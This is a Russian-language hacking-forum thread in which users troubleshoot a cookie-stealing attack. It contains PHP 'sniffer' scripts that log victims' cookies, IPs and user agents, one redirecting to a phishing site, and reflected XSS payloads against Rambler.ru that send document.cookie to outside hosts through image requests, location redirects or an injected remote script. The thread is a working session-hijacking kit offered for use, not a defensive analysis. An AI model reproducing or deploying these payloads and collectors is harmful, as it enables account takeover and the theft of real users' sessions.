Доброго времени суток. Прошу помочь советом? Я использую браузер Mozilla Firefox. Так вот проблема в том что я не могу отправить куки на сниффер. Начну попорядку. 1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код: <?php $log="log.txt"; $file=fopen($log,"a+"); $RZ="_"; $Date=date("d:m:Y"); $Time=date("H:i"); $IP=$_SERVER['REMOTE_ADDR']; $QS=$_SERVER['QUERY_STRING']; fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n"); fclose($file); ?> Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777. 2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert(). http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки.... Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так: http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script> Тоесть я предпологаю что все что находится после "?" будет отправлено в QUERY_STRING(так должно быть). Пробывал и так: http://........./.........?=<script>document.location.replace('http:sniffer.ru sniffer.php?'+document.cookie);</script>, тоже ничего. Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...
я пользовался таким сниффером. три файла log.php содержимое PHP: <?PHP $Cookies = UrlDecode(getenv("QUERY_STRING")); $Date = date("d-m-y H:i:s", time()); $browser = getenv("HTTP_USER_AGENT"); $ref = getenv("HTTP_REFERER"); $ip = getenv("REMOTE_ADDR"); $text = " $Cookies: $Date: $browser: $ref: $ip:"; $filelog = fopen("base.php","a+"); fwrite($filelog,"\n $text \n"); fclose($filelog); header('Location: http://www.адреc_фейка.ru'); ?> js.js содержимое PHP: var concat = function() { var args = Array.prototype.slice.call(arguments); return args.join(""); } a = "/log.php?"; b = document.cookie; location.href = concat(a, b); base.php - файл базы Вставка сниффера http://........./.........?"><script src="http://sniffer.ru/js.js"></script>
satana-fu, попробую использовать такой... но не думаю что беда в снифаке, я немогу понять почему они не отправляются.. Батхед - мне бы беспланый хостинг с php и htaccess, но я думая что такового не существует в сущности..... попробывал он-лайн сниффер. даю такой запрос но ничего не приходит......( http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>. Почему? Как через Оперу так и через Мозиллу....... Помогите?...
Главное время запроса и ip с рефером на на мой личный сниффер приходят вод так: 22:11:2009_14:37_а.й.п.и_....(айпи скрыл), а вот куки нет..... Подскажите в чем трабла, плиз..
satana-fu, с твои скриптом хоть что-то стало работать, теперь куки выводятся мне в адресную строку браузера, что делать?
тогда уж делай так чтоле http://rambler.ru?"><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>
если кукисы выводятся в адресную строку, то скорее всего у тебя на сервере проблема, а не в самом сниффере, обычно такая трабла у меня наблюдалась когда я тестил сниффер на фрихостии, ничего в файл не записывалось, и скрипт пытался кукисы передать get запросом. меняй сервак....
satana-fu, понял, у меня тоже все вывелось по твоей ссылке, . Наверное только в этом проблема. Попытаюсь найти нормальный хост. Подскажите если можно русский нормальный хостинг с поддрежкой php, если можно с регистрацией без отправки письма на мыло....
свершилось аказывается на моем хостинге запрещена функция на php для внешних ссылок, fopen(), наверное в этом трабла...
Да нет трабла не в этом, пишу значит так: http://mysniffer.ru/sniffer.php?1111, мне 1111 приходят на снифер, а вот что с запросом, не наю. Млин уже и через img() запрос писал и через докьюмент_локатион, и ничего....... Может есть еще способы чтобы както запрос дать на отправку кук на снифак?((((